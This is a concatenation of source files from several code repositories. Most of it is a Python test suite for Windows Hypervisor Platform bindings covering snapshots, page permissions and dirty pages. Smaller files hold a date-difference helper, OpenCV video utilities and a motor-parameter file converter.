Gpa, Entry in self.TranslationTable.iteritems(): # Don't save pages that are not writeable. if 'w' not in Entry.Flags: continue PageContent = ct.string_at(Entry.Hva, 0x1000) Snapshot['Mem'][Gpa] = ( Entry.Hva, PageContent ) self.ClearGpaRangeDirtyPages( 0, # XXX: This assumes that the physical address space is packed and that # there is no hole. len(self.TranslationTable) * 0x1000 ) return Snapshot def Restore(self, Snapshot): '''Restore a snapshot into the partition.''' for VpIndex, Registers in Snapshot['VP']: Vp = self.GetVp(VpIndex) Vp.SetRegisters( # XXX: Something cleaner maybe? dict(zip(hvplat.AllRegisters, Registers)) ) # Force a copy of the table. self.TranslationTable = dict(Snapshot['Table']) if False: # XXX: It's sound to be slower..? DirtyGpas = self.QueryGpaRangeDirtyPages( 0, # XXX: This assumes that the physical address space is packed and that # there is no hole. len(self.TranslationTable) * 0x1000 ) # Restore the dirty memory that has been saved off. for DirtyGpa in DirtyGpas: Hva, PageContent = Snapshot['Mem'].get(DirtyGpa) ct.memmove(Hva, PageContent, 0x1000) else: # Restore the dirty memory that has been saved off. for Hva, PageContent in Snapshot['Mem'].itervalues(): ct.memmove(Hva, PageContent, 0x1000) self.ClearGpaRangeDirtyPages( 0, # XXX: This assumes that the physical address space is packed and that # there is no hole. len(self.TranslationTable) * 0x1000 ) def GetTranslationTable(self): '''Return a copy of the translation table.''' return dict(self.TranslationTable) def main(argc, argv): return 0 if __name__ == '__main__': sys.exit(main(len(sys.argv), sys.argv)) ``` #### File: 0vercl0k/pywinhv/test64.py ```python import pywinhv as hv import sys import struct import unittest import ctypes as ct # mov rax, Address ; mov rbx, Value ; mov [rax], rbx WriteMemory64 = lambda Address, Value: '\x48\xb8' + struct.pack('<Q', Address) + '\x48\xbb' + struct.pack('<Q', Value) + '\x48\x89\x18' # mov rax, Address ; mov rax, [rax] ReadMemory64 = lambda Address: '\x48\xb8' + struct.pack('<Q', Address) + '\x48\x8b\x00' # mov rax, gs:[0] LoadGsInRax = '\x65\x48\x8b\x04\x25\x00\x00\x00\x00' # inc rax IncRax = '\x48\xff\xc0' # int3 Int3 = '\xcc' class PackedPhysicalMemory(object): '''The goal of this class is to provide a very simple GPA allocation policy. It basically packs up the physical space page by page.''' def __init__(self, BaseGpa = 0): self.Gpa = 0 def GetGpa(self, Pages = 1): '''Get the next available GPA address.''' Gpa = self.Gpa self.Gpa += (0x1000 * Pages) return Gpa def CreatePartition(Pages, PackedSpacePolicy, TebGva): '''Create a partition and configure it like a Windows 64bit environment.''' Partition = hv.WHvPartition.CreateDefault('64b user') Vp = Partition.GetVp(0) # Let's enable long mode now... # https://wiki.osdev.org/Setting_Up_Long_Mode. # We basically need several things (cf https://wiki.osdev.org/X86-64): # * Set the PAE enable bit in CR4 # * Load CR3 with the physical address of the PML4 # * Enable long mode by setting the EFER.LME flag in MSR 0xC0000080 # * Enable paging # OK so we need to allocate memory for paging structures, and build the # virtual address space. Pml4Gpa = hv.BuildVirtualAddressSpace( Partition, Pages, PackedSpacePolicy ) # Turn on CR4.PAE. # kd> r @cr4 # cr4=0000000000170678 # 0b100110000011000100000 # 'Physical Address Extension', 'Operating system support for FXSAVE and FXRSTOR instructions', # 'Operating System Support for Unmasked SIMD Floating-Point Exceptions', # 'Enables the instructions RDFSBASE, RDGSBASE, WRFSBASE, and WRGSBASE', # 'PCID Enable', 'Supervisor Mode Execution Protection Enable'. Cr4 = 0x000000000170678 # We need to update CR3 to point to the PML4's physical address. Cr3 = Pml4Gpa # Turn on EFER.LME. # kd> rdmsr 0xC0000080 # msr[c0000080] = 00000000`00000d01 # 0b0000110100000001 # 'System Call Extensions', 'Long Mode Enable', 'Long Mode Active', 'No-Execute Enable'. Efer = 0xD01 # Turn on CR0.PG. # kd> r @cr0 # Last set context: # cr0=0000000080050031 # 'Protected Mode Enable', 'Extension type', 'Numeric Error', 'Write Protect', # 'Alignment mask', 'Paging'. Cr0 = 0x80050031 Vp.SetRegisters({ hv.Cr0 : Cr0, hv.Cr3 : Cr3, hv.Cr4 : Cr4, hv.Efer : Efer, }) print 'Enabled 64-bit long mode' # We should be good to set-up 64-bit user-mode segments now. # 0:000> r @cs # cs=0033 Cs = hv.Generate64bUserCodeSegment() # 0:001> r @ss # ss=002b DataSegment = hv.Generate64bUserDataSegment() # 0:001> r @fs # fs=0053 TebSegment = hv.Generate64bUserDataSegment(TebGva) Vp.SetRegisters({ hv.Cs : Cs, hv.Ss : DataSegment, hv.Ds : DataSegment, hv.Es : DataSegment, hv.Fs : DataSegment, hv.Gs : TebSegment, #_Rdx : 0, XXX Figure out where the 806e9 is coming from. }) print 'Partition created:', Partition return Partition # https://wiki.osdev.org/Exceptions#Page_Fault PF_ERRCODE_PRESENT = 1 << 0 PF_ERRCODE_WRITE = 1 << 1 PF_ERRCODE_USER = 1 << 2 PF_ERRCODE_RESERVED_WRITE = 1 << 3 PF_ERRCODE_IFETCH = 1 << 4 class FeatureTests(unittest.TestCase): '''Test everything related to features.''' @classmethod def setUpClass(cls): '''This method is called once and initialize a partition object with a bunch of pages mapped in already.''' cls.TebGva = 0x000008b307ae000 cls.CodeGva = 0x00007fffb8c05000 cls.ReadOnlyGva = 0x00007fffb8c06000 cls.ReadWriteGva = 0x00007fffb8c07000 cls.ReadWriteExecuteGva = 0x00007fffb8c08000 cls.KernelPageGva = 0xfffff80178e05000 cls.Page0Gva = 0x0007ff60cf10000 cls.Page1Gva = 0x0007ff60cf11000 cls.Pages = [ (cls.TebGva, 'rw'), (cls.CodeGva, 'rx'), (cls.ReadOnlyGva, 'r'), (cls.ReadWriteGva, 'rw'), (cls.KernelPageGva, 'rwx'), # Those VAs have the same PTE, and used to trigger a bug in the # page table generation. # PML4E=255, PDPTE=485, PDE=310, PTE=353. (0x00007ff966d61000, 'r'), # PML4E=255, PDPTE=485, PDE=337, PTE=353. (0x00007ff96a361000, 'r'), # PML4E=255, PDPTE=309, PDE=172, PTE=353 (0x0000014d55961000, 'r'), # The goal with these is to have 2 contiguous pages in the virtual # space but not in the host virtual space. (cls.Page0Gva, 'rw'), (cls.Page1Gva, 'rw') ] cls.Policy = PackedPhysicalMemory() cls.Partition = CreatePartition(cls.Pages, cls.Policy, cls.TebGva) cls.Vp = cls.Partition.GetVp(0) TranslationResult, cls.CodeHva = cls.Vp.TranslateGvaToHva(cls.CodeGva) assert TranslationResult.value == hv.WHvTranslateGvaResultSuccess, 'The GVA->HVA translation should be a success' cls.Snapshot = cls.Partition.Save() def setUp(self): '''Restore the context everytime before executing a test.''' self.Partition.Restore(self.Snapshot) def test_readwrite_unmapped(self): '''Read from / to unmapped GVA.''' self.assertFalse(self.Vp.WriteGva( 0, 'hello' ), 'The write to unmapped memory should fail.' ) self.assertIsNone(self.Vp.ReadGva( 0, 0x1000 ), 'The read to unmapped memory should fail.' ) def test_writegva_cross_pages(self): '''Read from and write to GVA space across two pages that are not contiguous in the host virtual space.''' TranslationResult, Hva0 = self.Vp.TranslateGvaToHva(self.Page0Gva) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The translation should succeed.' ) self.assertIsNotNone(Hva0, 'The GVA->HVA translation should succeed.') TranslationResult, Hva1 = self.Vp.TranslateGvaToHva(self.Page1Gva) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The translation should succeed.' ) self.assertIsNotNone(Hva1, 'The GVA->HVA translation should succeed.') self.assertNotEqual( abs(Hva1 - Hva0), 0x1000, 'The two pages should not be contiguous in host virtual space.' ) Content = 'hello friends!' EndOffset = 0xff8 Address = self.Page0Gva + EndOffset self.assertTrue(self.Vp.WriteGva( Address, Content )) # The first 8 bytes are at the end of the first page. First = ct.string_at(Hva0 + EndOffset, 8) # The last 6 bytes are at the beginning of the second page. Second = ct.string_at(Hva1, 6) self.assertEqual( First + Second, Content, 'The first and second bit should match the content.' ) ReadContent = self.Vp.ReadGva( self.Page0Gva + EndOffset, len(Content) ) self.assertEqual( ReadContent, Content, 'The content should match.' ) def test_snapshot_only_writeable(self): '''Ensure that the snapshot only restores / track pages that are writeable.''' ByteSaved = self.Vp.ReadGva( self.ReadOnlyGva, 1 ) self.assertIsNotNone(ByteSaved, 'The ByteSaved should not be None.') Snapshot = self.Partition.Save() self.assertTrue(self.Vp.WriteGva( self.ReadOnlyGva, '\xAA', Force = True )) self.Partition.Restore(Snapshot) ByteRead = self.Vp.ReadGva( self.ReadOnlyGva, 1 ) self.assertNotEqual( ByteSaved, ByteRead, 'The two bytes should match up.' ) # Restore the orginal byte as it will never get its original value back # otherwise. self.assertTrue(self.Vp.WriteGva( self.ReadOnlyGva, ByteSaved, Force = True )) def test_mapregion_translategpa(self): '''Map a GPA range bigger than 0x1000 and ensure the GPA->HVA translation works on every page of the region.''' RegionSize = 5 RegionGpa = self.Policy.GetGpa(5) HvaBase, SizeInBytes = self.Partition.MapGpaRange( RegionGpa, 'hello', 'r' ) for Offset in range(0, SizeInBytes, 0x1000): CurHva = self.Partition.TranslateGpa(RegionGpa + Offset) self.assertEqual( CurHva, HvaBase + Offset, 'The two HVAs should match.' ) def test_translate_gva_with_permcheck_kern(self): '''Translate a GVA->GPA and validate page permissions against a kernl page.''' TranslationResult, _ = self.Vp.TranslateGva( self.KernelPageGva, 'r' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The kernel page should not be readable from cpl3.' ) TranslationResult, _ = self.Vp.TranslateGva( self.KernelPageGva, 're' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The kernel page should be translatable from cpl3 with PrivilegeExempt.' ) def test_translate_gva_with_permcheck_rx(self): '''Translate a GVA->GPA and validate page permissions against a rx page.''' TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'r' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The code page should be marked as readable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'w' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The code page page should not be marked as writeable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'x' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The code page should be marked as executable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'rx' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The code page should be marked as rw in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'rwx' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The code page should not be marked as rwx in the page tables.' ) def test_translate_gva_with_permcheck_rx(self): '''Translate a GVA->GPA and validate page permissions against a rx page.''' TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'r' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The code page should be marked as readable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'w' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The code page page should not be marked as writeable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'x' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The code page should be marked as executable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'rx' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The code page should be marked as rw in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.CodeGva, 'rwx' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The code page should not be marked as rwx in the page tables.' ) def test_translate_gva_with_permcheck_ro(self): '''Translate a GVA->GPA and validate page permissions against a read-only page.''' TranslationResult, _ = self.Vp.TranslateGva( self.ReadOnlyGva, 'r' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The read-only page should be marked as readable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.ReadOnlyGva, 'w' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The read-only page should not be marked as writeable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.ReadOnlyGva, 'x' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The read-only page should not be marked as executable in the page tables.' ) TranslationResult, _ = self.Vp.TranslateGva( self.ReadOnlyGva, 'xe' ) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultPrivilegeViolation, 'The translation should still return a PrivilegeViolation even with WHvTranslateGvaFlagPrivilegeExempt.' ) def test_clear_dirty_pages(self): '''Clear the dirty bits of the pages.''' Code = WriteMemory64(self.TebGva, 1) + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) self.Vp.Run() DirtyGpas = self.Partition.QueryGpaRangeDirtyPages( 0, len(self.Partition.TranslationTable) * 0x1000 ) TranslationResult, TebGpa = self.Vp.TranslateGva(self.TebGva) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The TEB GVA->GPA translation result (%s) must be a success.' % TranslationResult ) self.assertEqual( TebGpa in DirtyGpas, True, 'The TEB GPA should be dirty.' ) self.Partition.ClearGpaRangeDirtyPages( 0, len(self.Partition.TranslationTable) * 0x1000 ) Bits = self.Partition.QueryGpaRangeDirtyBitmap( 0, len(self.Partition.TranslationTable) * 0x1000 ) for Bit in Bits: self.assertEqual( Bit, 0, 'Bit(%x) is expected to be cleared.' % Bit ) def test_number_dirty_pages(self): '''Count the number of bits returned for dirty pages.''' Bits = self.Partition.QueryGpaRangeDirtyBitmap( 0, len(self.Partition.TranslationTable) * 0x1000 ) self.assertEqual( len(Bits), len(self.Partition.TranslationTable), 'The number of bits(%x) has to match the number of physical pages.' % len(Bits) ) def test_read_from_noncanonical(self): '''Read from a non canonical page.''' NonCanonicalGva = 0xdeadbeefbaadc0de Code = ReadMemory64(NonCanonicalGva) ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) ExitContext, _ = self.Vp.Run() VpException = ExitContext.VpException self.assertEqual( VpException.ExceptionType, hv.WHvX64ExceptionTypeGeneralProtectionFault, 'A GeneralProtection exception(%x) is expected.' % VpException.ExceptionType ) self.assertEqual( # Error code: The General Protection Fault sets an error code, # which is the segment selector index when the exception is segment related. # Otherwise, 0. VpException.ErrorCode, 0, 'The ErrorCode(%x) is expected to be 0.' % VpException.ErrorCode, ) def test_read_from_nonpresent(self): '''Read from a non-present page.''' NonPresentGva = 1337 Code = ReadMemory64(NonPresentGva) ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) ExitContext, _ = self.Vp.Run() VpException = ExitContext.VpException self.assertEqual( VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault, 'A PageFault exception(%x) is expected.' % VpException.ExceptionType ) self.assertEqual( VpException.ErrorCode, PF_ERRCODE_USER, 'The ErrorCode(%x) is expecting to show a read-access from non present GVA.' % VpException.ErrorCode, ) self.assertEqual( VpException.ExceptionParameter, NonPresentGva, 'The ExceptionParameter(%x) should be the GVA of the non-present page.' % VpException.ExceptionParameter ) def test_read_from_supervisor(self): '''Read from supervisor memory.''' Code = ReadMemory64(self.KernelPageGva) + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) ExitContext, _ = self.Vp.Run() VpException = ExitContext.VpException self.assertEqual( VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault, 'A PageFault exception(%x) is expected.' % VpException.ExceptionType ) self.assertEqual( VpException.ErrorCode, PF_ERRCODE_PRESENT | PF_ERRCODE_USER, 'The ErrorCode(%x) is expecting to show a write-access.' % VpException.ErrorCode, ) self.assertEqual( VpException.ExceptionParameter, self.KernelPageGva, 'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter ) def test_execute_readonly(self): '''Execute read-only memory.''' Content = IncRax + Int3 self.assertTrue(self.Vp.WriteGva( self.ReadOnlyGva, Content, Force = True )) self.Vp.SetRip(self.ReadOnlyGva) ExitContext, _ = self.Vp.Run() VpException = ExitContext.VpException self.assertEqual( VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault, 'A PageFault exception(%x) is expected.' % VpException.ExceptionType ) self.assertEqual( VpException.ErrorCode, PF_ERRCODE_PRESENT | PF_ERRCODE_USER | PF_ERRCODE_IFETCH, 'The ErrorCode(%x) is expecting to show an execute-access.' % VpException.ErrorCode, ) self.assertEqual( VpException.ExceptionParameter, self.ReadOnlyGva, 'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter ) def test_write_to_readonly(self): '''Write to read-only memory.''' Value = 0xdeadbeefbaadc0de Content = struct.pack('<Q', Value) self.assertTrue(self.Vp.WriteGva( self.ReadOnlyGva, Content, Force = True )) Code = WriteMemory64(self.ReadOnlyGva, Value) + Int3 self.assertTrue(self.Vp.WriteGva( self.CodeGva, Code, Force = True )) self.Vp.SetRip(self.CodeGva) ExitContext, _ = self.Vp.Run() VpException = ExitContext.VpException self.assertEqual( VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault, 'A PageFault exception(%x) is expected.' % VpException.ExceptionType ) self.assertEqual( VpException.ErrorCode, PF_ERRCODE_PRESENT | PF_ERRCODE_USER | PF_ERRCODE_WRITE, 'The ErrorCode(%x) is expecting to show a write-access.' % VpException.ErrorCode, ) self.assertEqual( VpException.ExceptionParameter, self.ReadOnlyGva, 'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter ) def test_read_from_readonly(self): '''Read from read-only memory.''' Value = 0xdeadbeefbaadc0de Content = struct.pack('<Q', Value) self.assertTrue(self.Vp.WriteGva( self.ReadOnlyGva, Content, Force = True )) Code = ReadMemory64(self.ReadOnlyGva) + Int3 self.assertTrue(self.Vp.WriteGva( self.CodeGva, Code, Force = True )) self.Vp.SetRip(self.CodeGva) ExitContext, _ = self.Vp.Run() Rax = self.Vp.GetRegister64(hv.Rax) self.assertEqual( Rax, Value, '@rax(%x) is supposed to have the expected value' % Rax ) def test_read_from_gs(self): '''Read memory from the GS segment.''' TebValue = 0xdeadbeefbaadc0de TebContent = struct.pack('<Q', TebValue) self.assertTrue(self.Vp.WriteGva( self.TebGva, TebContent )) Code = LoadGsInRax + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) ExitContext, _ = self.Vp.Run() Rax = self.Vp.GetRegister64(hv.Rax) self.assertEqual( Rax, TebValue, '@rax(%x) is supposed to have the expected Teb value' % Rax ) def test_gva_translations(self): '''Run GVA translations on the partition.''' Gpas = [] for Gva, _ in self.Pages: ResultCode, Gpa = self.Vp.TranslateGva(Gva) self.assertEqual( ResultCode.value, hv.WHvTranslateGvaResultSuccess, 'TranslateGva(%x) returned %s.' % (Gpa, ResultCode) ) Gpas.append(Gva) self.assertEqual( len(set(Gpas)), len(Gpas), 'Every GVA should map to a unique GPA' ) def test_simple_user(self): '''Run a bunch of 'inc rax' followed by an 'int3' which we should get a VMEXIT for, and then step over and execute another 'inc rax' followed by an 'int3' and get one last VMEXIT.''' CodeGva = self.CodeGva N = 137 Code = '' # inc rax ; ... ; inc rax Code += IncRax * N # Compute the expected @rip at the first vmexit before we add the rest of the # code. This is used for testing everything is going as expected. ExpectedRip1 = CodeGva + len(Code) # int3. This is where the first vmexit we should get. We will skip over the # instruction and continue. Code += Int3 Code += IncRax ExpectedRip2 = CodeGva + len(Code) # int3. This is the second vmexit we should get. Code += Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(CodeGva) ExitContext, ExitReason = self.Vp.Run() Rip, Rax = self.Vp.GetRegisters64( hv.Rip, hv.Rax ) ExpectedRax = N self.assertEqual( Rax, N, '@rax(%x) does not match the magic value.' % Rax ) self.assertEqual( Rip, ExpectedRip1, '@rip(%x) does not match the end @rip.' % Rip ) self.assertEqual( ExitReason.value, hv.WHvRunVpExitReasonException, 'An exception VMEXIT is expected when the int3 is triggered.' ) self.assertEqual( ExitContext.VpException.ExceptionType, hv.WHvX64ExceptionTypeBreakpointTrap, 'A breakpoint exception is expected.' ) VpContext = ExitContext.VpContext self.assertEqual( VpContext.InstructionLength, len(Int3), 'The instruction length(%x) is supposed to be 1.' % VpContext.InstructionLength ) # Successfully caught the first int3 interruption, stepping over it. self.Vp.SetRip(Rip + len(Int3)) ExitContext, _ = self.Vp.Run() Rip, Rax = self.Vp.GetRegisters64( hv.Rip, hv.Rax ) ExpectedRax += 1 self.assertEqual( Rax, ExpectedRax, '@rax(%x) does not match the magic value.' % Rax ) self.assertEqual( Rip, ExpectedRip2, '@rip(%x) does not match the end @rip.' % Rip ) self.assertEqual( ExitReason.value, hv.WHvRunVpExitReasonException, 'An exception VMEXIT is expected when the int3 is triggered.' ) self.assertEqual( ExitContext.VpException.ExceptionType, hv.WHvX64ExceptionTypeBreakpointTrap, 'A breakpoint exception is expected.' ) VpContext = ExitContext.VpContext self.assertEqual( VpContext.InstructionLength, len(Int3), 'The instruction length(%x) is supposed to be 1.' % VpContext.InstructionLength ) def test_partition_counters(self): '''Check the WHvPartitionCounterSetMemory partition performance counter.''' MemoryCounters = self.Partition.GetPartitionCounters( hv.WHvPartitionCounterSetMemory ) self.assertEqual( MemoryCounters.Mapped1GPageCount, 0, 'There should not be any 1GB pages.' ) self.assertEqual( MemoryCounters.Mapped2MPageCount, 0, 'There should not be any 2MB pages.' ) PageCount = 24 self.assertGreaterEqual( MemoryCounters.Mapped4KPageCount, PageCount, 'There should be only > %d pages.' % PageCount ) def test_vp_counters(self): '''Check the processor performance counters.''' # XXX: They don't look right? pass def test_save_restore_registers(self): '''Take a snapshot modify registers and restore it.''' self.Vp.SetRegisters({ hv.Rax : 0xdeadbeefbaadc0de, hv.Rbx : 0xdeadbeefbaadc0de, hv.Rcx : 0xdeadbeefbaadc0de, hv.Rip : 0xdeadbeefbaadc0de, hv.Rsp : 0xdeadbeefbaadc0de }) Snapshot = self.Partition.Save() InitRax = self.Vp.GetRegister64(hv.Rax) self.Vp.SetRegister(hv.Rax, 0xaaaaaaaaaaaaaaaa) self.Partition.Restore(Snapshot) Rax = self.Vp.GetRegister64(hv.Rax) self.assertEqual( Rax, InitRax, '@rax(%x) does not match the value it had before the snapshot.' % Rax ) def test_save_restore_memory(self): '''Take a snapshot modify memory and restore it.''' TebContent = '\xaa' * 8 self.assertTrue(self.Vp.WriteGva( self.TebGva, TebContent )) Snapshot = self.Partition.Save() Code = WriteMemory64(self.TebGva, 0xbbbbbbbbbbbbbbbb) + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) self.Vp.Run() self.assertEqual(self.Vp.ReadGva( self.TebGva, 8 ), '\xbb' * 8, 'The TEB is expected to contain bbs.' ) self.Partition.Restore(Snapshot) Code = ReadMemory64(self.TebGva) + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) self.Vp.Run() Rax = self.Vp.GetRegister64(hv.Rax) self.assertEqual( Rax, 0xaaaaaaaaaaaaaaaa, '@rax(%x) is supposed to have the value restored by the snapshot.' % Rax ) def test_save_restore_gpa_to_hva(self): '''Ensure that the translation table is saved in a snapshot.''' TranslationTable = self.Partition.GetTranslationTable() Snapshot = self.Partition.Save() PageGpa = self.Policy.GetGpa() Hva, Size = self.Partition.MapGpaRange( PageGpa, 'hello', 'r' ) self.assertEqual( Size, 0x1000, 'The size(%x) is expected to be a page large.' % Size ) self.assertEqual( PageGpa in self.Partition.TranslationTable, True, 'The GPA(%x) is expected to be added to the translation table.' % PageGpa ) self.assertEqual( self.Partition.TranslationTable != TranslationTable, True, 'The translation tables are expected to be different.' ) self.Partition.Restore(Snapshot) self.assertEqual( PageGpa not in self.Partition.TranslationTable, True, 'The GPA(%x) is expected to not be in the translation table anymore.' % PageGpa ) self.Partition.UnmapGpaRange( PageGpa, 0x1000, Hva ) self.assertEqual( self.Partition.TranslationTable, TranslationTable, 'The translation tables are expected to be different.' ) def test_save_restore_dirty_pages(self): '''Ensure that a dirty page is turned non dirty after a snapshot. Also ensure that on restore it keeps non dirty.''' # Let's make sure the TEB page is clean. TranslationResult, TebGpa = self.Vp.TranslateGva(self.TebGva) self.assertEqual( TranslationResult.value, hv.WHvTranslateGvaResultSuccess, 'The TEB GVA->GPA translation result(%s) must be a success.' % TranslationResult ) Dirty = self.Partition.IsGpaDirty(TebGpa) self.assertEqual( Dirty, False, 'The TEB page is expected to be clean.' ) # Dirty the TEB page. Code = WriteMemory64(self.TebGva, 1) + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) self.Vp.Run() # Ensure the page is dirty. Dirty = self.Partition.IsGpaDirty(TebGpa) self.assertEqual( Dirty, True, 'The TEB page is expected to be dirty.' ) # Grab a snapshot. Snapshot = self.Partition.Save() # Make sure the page is clean again. Dirty = self.Partition.IsGpaDirty(TebGpa) self.assertEqual( Dirty, False, 'The TEB page is expected to be clean after snapshot.' ) # Dirty the TEB page. Code = WriteMemory64(self.TebGva, 1) + Int3 ct.memmove(self.CodeHva, Code, len(Code)) self.Vp.SetRip(self.CodeGva) self.Vp.Run() # Ensure the page is dirty. Dirty = self.Partition.IsGpaDirty(TebGpa) self.assertEqual( Dirty, True, 'The TEB page is expected to be dirty.' ) # Restore the snapshot. self.Partition.Restore(Snapshot) # Ensure the page is back clear again. Dirty = self.Partition.IsGpaDirty(TebGpa) self.assertEqual( Dirty, False, 'The TEB page is expected to be clean after restore.' ) def main(argc, argv): HypervisorPresent = hv.IsHypervisorPresent() print 'HypervisorPresent:', HypervisorPresent if not HypervisorPresent: return 1 unittest.main(verbosity = 2) return 0 if __name__ == '__main__': sys.exit(main(len(sys.argv), sys.argv)) ```
{ "source": "0versun/telega_moto", "score": 4 }
#### File: telega_moto/data/timing_processor.py ```python import datetime def return_dif(target_year, target_mont, target_day): today = datetime.date.today() targer = datetime.date(int(target_year), int(target_mont), int(target_day)) if targer < today: output_day = today - targer print('Эта дата уже наступила и прошла', output_day.days) return 'нисколько, эта дата уже наступила и прошла' elif targer == today: return 'нисколько, потому что, этот день настал сегодня' else: output_day = targer - today return output_day.days ```
{ "source": "0w1Gr3y/MOT_ByteTrack", "score": 3 }
#### File: 0w1Gr3y/MOT_ByteTrack/utils.py ```python import numpy as np import cv2 as cv def resize_image(image, new_size=(-1, 400), interpolation=cv.INTER_LINEAR): ''' :param image: input image :param new_size: (width, height) or (-1, h) or (w, -1) :param interpolation: opencv cv.INTER_* flag :return: resized image ''' image_size = (image.shape[1], image.shape[0]) if new_size[0] == -1: image_size_new = (int(image_size[0] * new_size[1] / image_size[1]), new_size[1]) elif new_size[1] == -1: image_size_new = (new_size[0], int(image_size[1] * new_size[0] / image_size[0])) else: image_size_new = (new_size[1], new_size[0]) return cv.resize(image, image_size_new, interpolation=interpolation) # ) def show_image(image_name, image, new_size=(-1, 400)): ''' :param image_name: image window name :param image: input image :param new_size: (width, height) or (-1, h) or (w, -1) :return: ''' image_show = resize_image(image, new_size) cv.imshow(image_name, image_show) ``` #### File: 0w1Gr3y/MOT_ByteTrack/VideoPlayer.py ```python import cv2 as cv class VideoPlayer: def __init__(self, video_path): self.video_path = video_path self.video_cap = cv.VideoCapture(video_path) if not self.video_cap.isOpened(): print("Error opening video stream or file") self.video_cap = None return self.fps = int(self.video_cap.get(cv.CAP_PROP_FPS)) self.cv_wait_time = int(1000 / self.fps) self.width = int(self.video_cap.get(cv.CAP_PROP_FRAME_WIDTH)) self.height = int(self.video_cap.get(cv.CAP_PROP_FRAME_HEIGHT)) print('inited video capture \"{}\" | FPS: {} | Resolution: {}x{}'.format(video_path, self.fps, self.video_cap.get( cv.CAP_PROP_FRAME_WIDTH), self.video_cap.get( cv.CAP_PROP_FRAME_HEIGHT))) def get_frame(self): ret, frame = self.video_cap.read() return ret, frame def reset(self): self.video_cap.release() self.video_cap = cv.VideoCapture(self.video_path) def __del__(self): if self.video_cap is not None: self.video_cap.release() ```
{ "source": "0w8States/Drive-Manager-2-Utilites", "score": 3 }
#### File: 0w8States/Drive-Manager-2-Utilites/main.py ```python IMPORT_PATH = "./motor-parameter-files/" #Directory where to export the DM2 files EXPORT_PATH = "" #Path for DM2 XML Templates XML_TEMPLATES = "./XML_Templates/" import os from DM2 import MotorUtility import traceback import logging #Walk the OS path to for any files in the director or sub-directories def ccm_folder_walk(IMPORT_PATH): filelist = [] for root, dirs, files in os.walk(IMPORT_PATH): for file in files: if file[-4:] == ".ccm": #Append the file name to the list filelist.append(os.path.join(root,file)) return filelist def main(): #Create and EL7411 Object dm2motor = MotorUtility() #Mass Import Routine filelist = ccm_folder_walk(IMPORT_PATH) print(f"Now Importing {len(filelist)} Motor Files...") dc_motor_count = 0 ac_motor_count = 0 for file in filelist: try: dm2motor.import_ccm_motordata(file) #You can print the motor data for each file like this #print(el7411.get_motor_data()) if dm2motor.IsAc == "false": dm2motor.export_EL7411_dmmotor(EXPORT_PATH) dc_motor_count += 1 except Exception as e: print("On File:", file) logging.error(traceback.format_exc()) # Logs the error appropriately. print(f"Number of DC Motors Exported: {dc_motor_count}") print(f"Number of AC Motors Exported: {ac_motor_count}") if __name__ == '__main__': main() ```
{ "source": "0w8States/numpy-stack-samples", "score": 4 }
